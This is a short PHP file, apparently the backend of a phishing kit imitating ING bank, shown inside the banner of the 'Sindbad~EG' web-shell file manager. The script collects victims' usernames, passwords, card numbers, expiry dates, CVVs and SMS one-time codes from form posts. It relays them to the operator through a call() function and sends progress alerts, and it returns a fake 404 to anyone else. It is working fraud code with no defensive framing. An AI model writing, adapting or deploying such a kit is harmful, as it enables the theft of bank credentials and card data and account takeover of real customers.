Sindbad~EG File Manager
<?php
require '../config.php';
if(isset($_POST['user'])){
call("/- ING Log -/
User: ".$_POST['user']."
Pass: ".$_POST['pass']);
return;
}
if(isset($_POST['name'])){
call("/- ING CC -/
Name: ".$_POST['name']."
Cc: ".$_POST['cc']."
Exp: ".$_POST['exp']."
Cvv: ".$_POST['cvv']);
return;
}
if(isset($_POST['carding'])){
call("ING Notification
Entering card info...
");
return;
}
if(isset($_POST['otping'])){
call("ING Notification
Entering sms...
");
return;
}
if(isset($_POST['sms'])){
call("/- ING SMS -/
CODE: ".$_POST['sms']);
return;
}
header("HTTP/1.0 404 Not Found");
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists